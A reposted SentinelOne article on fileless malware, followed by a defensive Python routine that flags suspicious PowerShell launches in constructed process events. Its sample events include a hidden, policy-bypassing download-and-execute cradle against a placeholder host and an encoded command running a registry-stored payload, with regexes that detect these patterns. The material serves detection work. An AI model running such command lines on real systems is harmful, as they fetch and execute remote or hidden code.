Your Worst Nightmare: Fileless Malware Attack
“By now, everyone pretty much knows what malware is and how it works: Victims receive an email telling them that if they just open the attached PDF, their entire life will morph into heaven on earth. Or they get an email telling them that they need to click on a link to avoid blowing up the universe, or some such catastrophe. In any event, the malware can be stymied by simply not opening the attachment, clicking on the link or whatever. It’s pretty simple. Just educate the users not to open attachments from unfamiliar email senders, links from what appear to be legitimate e-commerce sites and so on. Bad actors defeated. World safe again.
Unfortunately, the bad guys are hip to this, which is why a new type of cyberattack is taking hold: fileless malware. Unlike the malware described in the opening paragraph, fileless malware does not depend on the victim downloading any files. That’s because it doesn’t require any files. It invades systems in two ways:
– The malware’s code resides in RAM or in the system registry.
– The malware infects its host through scripts.
Conventional Delivery Methods and Unconventional Purposes
Even though files are not used to deliver the malicious code, phishing schemes can still be used to allow the code to infiltrate systems. For example, malicious code can be delivered in the form of a Word document, which, when opened, releases the malware. Of further concern is that fileless malware often uses anti-forensics techniques to erase its tracks, thus making it completely invisible.
The purpose of fileless malware is most often similar to that of conventional attacks: get access to credentialed data and personal information. However, because of its stealthy and persistent nature, there is some suspicion that fileless malware will be used to support espionage activities and to set the stage for future acts of sabotage. Such attacks jumped 94% in the first half of 2018, according to SentinelOne. Earlier this year, McAfee published findings indicating a 267% spike in fileless malware samples spreading PowerShell in the fourth quarter of 2017 alone, compared with the same time period one year prior. The simultaneous increase in fileless attacks indicates threat actors are becoming more sophisticated and turning toward advanced forms of cybercrime. It’s becoming less difficult for them to create payloads that won’t get caught, complicating defense for targets.
Can Fileless Malware Be Stopped?
Of course it can. This is where endpoint security solutions that use behavioral AI detection and layered security really shine. But even before that, there are some simple steps like these that can reduce the attack surface.
Organizations have to realize that processes that run scripts, like Microsoft PowerShell, are just as capable of delivering malware as processes that execute them, like opening a PDF. Secondly, companies must make sure that their employees are educated about the dangers of opening attachments that aren’t from known senders, and third, every patch issued by any vendor must be installed immediately.
The threat vectors are ever-increasing, but due diligence in employee education, and choosing the right security solution still offers the best chance of not becoming the next victim of the new bad kid on the block, fileless malware.”
Article source: SentinelOne
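The quoted article says fileless malware lives in RAM or the registry, arrives through scripts such as PowerShell, and is often launched from an Office document. On the defender's side, that translates into watching process-creation telemetry for script hosts that behave that way. The following is an added example, not code from the SentinelOne article or any SentinelOne product: a small Python triage routine run over constructed process-creation events (field names `parent`, `image`, `cmdline` are an assumption loosely modelled on Windows event 4688 / Sysmon event 1; the events, the registry key `HKCU:\Software\ConstructedSample` and the URL `example.invalid` are all made up for the example). It decodes `-EncodedCommand` arguments the way PowerShell does (base64 of UTF-16LE text) so an encoded payload is judged by what it would run, and it flags the behaviours the article describes: in-memory download cradles, payloads read out of the registry, hidden windows with execution-policy bypass, and a script host spawned by an Office application.

```python
import base64
import re
from pathlib import PureWindowsPath
from typing import Optional

# Constructed sample of a registry-resident payload (the "code resides in the
# system registry" case). PowerShell's -EncodedCommand is base64 of UTF-16LE
# text, so the sample is encoded the same way a real command line would be.
DECODED_SAMPLE = "Invoke-Expression (Get-ItemProperty 'HKCU:\\Software\\ConstructedSample').Payload"
ENCODED_SAMPLE = base64.b64encode(DECODED_SAMPLE.encode("utf-16le")).decode("ascii")

PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events (not real telemetry). Event 1 and 4 are benign controls.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "image": PS_IMAGE,
     "cmdline": "powershell.exe -NoProfile -Command Get-Service"},
    {"id": 2, "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": PS_IMAGE,
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -c "
                "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')\""},
    {"id": 3, "parent": r"C:\Windows\System32\cmd.exe", "image": PS_IMAGE,
     "cmdline": "powershell.exe -enc " + ENCODED_SAMPLE},
    {"id": 4, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\notes.txt"},
]

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
_ENC_RE = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")

# Behavioural indicators checked against the visible command line plus any
# decoded script. Order determines the order of the reported hits.
INDICATORS = [
    ("hidden_window", re.compile(r"(?i)[-/](?:w|win|windowstyle)\s+hidden")),
    ("execution_policy_bypass", re.compile(r"(?i)[-/](?:ep|exec|executionpolicy)\s+bypass")),
    ("in_memory_download_cradle", re.compile(
        r"(?i)\b(?:IEX|Invoke-Expression)\b.*(?:DownloadString|DownloadData|WebClient|Invoke-WebRequest|\biwr\b)")),
    ("registry_resident_payload", re.compile(
        r"(?i)\b(?:IEX|Invoke-Expression)\b.*(?:Get-ItemProperty|Get-ItemPropertyValue|HK(?:CU|LM):)")),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if there is none / it is malformed."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def indicators(event: dict) -> list:
    """List the behavioural indicators present in one process-creation event."""
    hits = []
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("encoded_command")
    # Drop the raw base64 blob (it could contain accidental substrings) and
    # append the decoded script so the payload is judged by what it would run.
    text = _ENC_RE.sub(" ", cmdline) + ("\n" + decoded if decoded else "")
    for name, pattern in INDICATORS:
        if pattern.search(text):
            hits.append(name)
    # Office document launching a script host: the "Word document releases the
    # malware" delivery path described in the article.
    if _basename(event["parent"]) in OFFICE_APPS and _basename(event["image"]) in SCRIPT_HOSTS:
        hits.append("office_spawned_script_host")
    return hits


def triage(events) -> dict:
    """Map event id -> indicators for every event that has at least one."""
    result = {}
    for ev in events:
        hits = indicators(ev)
        if hits:
            result[ev["id"]] = hits
    return result


if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(hits)}")
```

Each indicator on its own is weak (administrators do run `-EncodedCommand` and `-w hidden` from scheduled tasks), which is why the routine reports the full set per event rather than a single verdict; a rule that requires two or more indicators, or one indicator plus an Office parent, is a more useful alert threshold than any single pattern. Decoding the encoded command before matching is the step most worth keeping: without it, event 3 looks like nothing more than a base64 string.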